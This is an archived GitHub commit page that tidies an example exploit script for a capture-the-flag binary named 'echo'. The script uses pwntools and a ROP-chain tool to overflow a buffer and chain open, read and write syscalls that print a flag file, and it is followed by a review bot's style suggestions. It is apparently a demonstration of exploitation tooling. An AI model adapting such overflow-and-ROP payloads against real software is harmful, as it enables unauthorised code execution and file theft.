This repository has been archived by the owner on Nov 13, 2024. It is now read-only.

update examples
d4em0n committed Feb 7, 2020
1 parent 134a4d7 commit b653578
Showing 1 changed file with 6 additions and 9 deletions.
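--- a/examples/CJ2017_echo/exploit_orw.py
+++ b/examples/CJ2017_echo/exploit_orw.py
@@ -1,22 +1,19 @@
 from pwn import *
-import time
 from Exrop import Exrop
 
 binname = "echo"
-libc = ELF(binname, checksec=False)
-bss = libc.bss()
+elf = ELF(binname, checksec=False)
+rwaddr = elf.bss()
 
 SYS_OPEN = 2
 SYS_READ = 0
 SYS_WRITE = 1
 
-t = time.mktime(time.gmtime())
 rop = Exrop(binname)
-rop.find_gadgets(cache=True) # it's slow for first analyze keep waiting
-print("Analyzing done in {}s".format(time.mktime(time.gmtime()) - t))
-chain = rop.syscall(SYS_OPEN, ('./this_is_flag.txt', 0, 0), bss)
-chain += rop.syscall(SYS_READ, ('rax', bss, 0x40))
-chain += rop.syscall(SYS_WRITE, (1, bss, 0x40))
+rop.find_gadgets(cache=True)
+chain = rop.syscall(SYS_OPEN, ('./this_is_flag.txt', 0, 0), rwaddr)
+chain += rop.syscall(SYS_READ, ('rax', rwaddr, 0x40))
+chain += rop.syscall(SYS_WRITE, (1, rwaddr, 0x40))
 chain.dump()
 buf = b"A"*10008
 pay = buf + chain.payload_str()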
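Review bot: The new `rop.find_gadgets(cache=True)` line drops the comment that warned the first analysis is slow, and with the timing print also removed, a first run now gives no hint of why it appears to hang; I would keep a short comment such as `# first analysis is slow; cache=True is presumably what makes later runs faster`. The length `0x40` is written out in both the read and the write call, so a named constant (`READ_LEN = 0x40`) would keep the two in step. `rwaddr` would also benefit from a one-line comment saying it is the binary's .bss address used as scratch memory for the path string and the file contents, which is what the three `rop.syscall` calls appear to do with it. The script continues below the hunk.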